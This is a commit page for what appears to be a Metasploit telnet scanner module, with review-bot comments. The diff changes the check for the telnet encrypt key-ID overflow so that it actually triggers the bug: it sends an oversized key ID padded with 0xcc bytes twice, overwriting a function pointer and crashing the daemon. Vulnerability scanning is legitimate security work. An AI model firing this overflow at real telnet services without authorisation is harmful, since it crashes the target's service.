Handle patched systems accurately (requires actually triggering the bug)
HD Moore committed Dec 28, 2011
1 parent f8e3119 commit 617f325
Showing 1 changed file with 31 additions and 7 deletions.
38 changes: 31 additions & 7 deletions modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
Expand Up @@ -64,11 +64,14 @@ def run_host(ip)
break if data.index("\xff\xfa\x26\x02\x01")
end


buff_good = "\xff\xfa\x26" + "\x07" + "\x00" + ("X" * 63) + "\xff\xf0"
buff_long = "\xff\xfa\x26" + "\x07" + "\x00" + ("X" * 64) + "\xff\xf0"
buff_long = "\xff\xfa\x26" + "\x07" + "\x00" + ("X" * 64) + ( "\xcc" * 32) + "\xff\xf0"

begin

#
# Send a long, but within boundary Key ID
#
sock.put(buff_good)
data = sock.get_once(-1, 5) rescue nil
unless data
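Review bot: the replacement `buff_long = "\xff\xfa\x26" + "\x07" + "\x00" + ("X" * 64) + ( "\xcc" * 32) + "\xff\xf0"` appends 32 bytes of 0xcc after the 64-byte key ID, but nothing in the hunk says why; the only comment here ("Send a long, but within boundary Key ID") describes buff_good. Add a comment above buff_long stating why 64 + 32 bytes are needed for the check (the commit message says the bug must actually be triggered), so the padding is not treated as an arbitrary constant later. Also, the in-bounds probe keeps `data = sock.get_once(-1, 5) rescue nil` while the second hunk drops `rescue nil` for the long probes; if that asymmetry is deliberate (a disconnect on the in-bounds probe is not meaningful), say so in a comment.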
Expand All @@ -81,18 +84,39 @@ def run_host(ip)
return
end

#
# First round to overwrite the function pointer itself
#
sock.put(buff_long)
data = sock.get_once(-1, 5) rescue nil
data = sock.get_once(-1, 5)
unless data
print_status("#{ip}:#{rport} NOT VULNERABLE: No reply to 64-byte Key ID: #{banner_sanitized}")
print_status("#{ip}:#{rport} NOT VULNERABLE: No reply to first long Key ID: #{banner_sanitized}")
return
end

unless data.index("\xff\xfa\x26\x08\xff\xf0")
print_status("#{ip}:#{rport} UNKNOWN: Invalid reply to Key ID: #{data.unpack("H*")[0]} - #{banner_sanitized}")
print_status("#{ip}:#{rport} UNKNOWN: Invalid reply to first Key ID: #{data.unpack("H*")[0]} - #{banner_sanitized}")
return
end


#
# Second round to force the fucntion to be called
#
sock.put(buff_long)
data = sock.get_once(-1, 5)
unless data
print_status("#{ip}:#{rport} NOT VULNERABLE: No reply to second long Key ID: #{banner_sanitized}")
return
end

unless data.index("\xff\xfa\x26\x08\xff\xf0")
print_status("#{ip}:#{rport} UNKNOWN: Invalid reply to second Key ID: #{data.unpack("H*")[0]} - #{banner_sanitized}")
return
end

print_status("#{ip}:#{rport} NOT VULNERABLE: Service did not disconnect: #{banner_sanitized}")
return

rescue ::EOFError
end
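Review bot: dropping `rescue nil` from `data = sock.get_once(-1, 5)` means a socket error during the long probes now propagates to `rescue ::EOFError`, but that rescue has no body in the visible lines, so the one outcome the commit message cares about (the service disconnecting because the bug was triggered) prints nothing here while every other path prints NOT VULNERABLE or UNKNOWN; make sure the VULNERABLE report is issued in (or right after) that rescue, and decide whether a non-EOF error from get_once should be handled there too rather than aborting run_host. Since `print_status("#{ip}:#{rport} NOT VULNERABLE: Service did not disconnect: ...")` makes the disconnect the positive signal, a positive result now means the telnet daemon on the target was crashed; state that in the module description so operators know the check is destructive. The two long rounds are identical apart from the message strings, so a two-iteration loop would remove the duplicated block, and the comment "# Second round to force the fucntion to be called" has a typo ("function").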


0 comments on commit 617f325
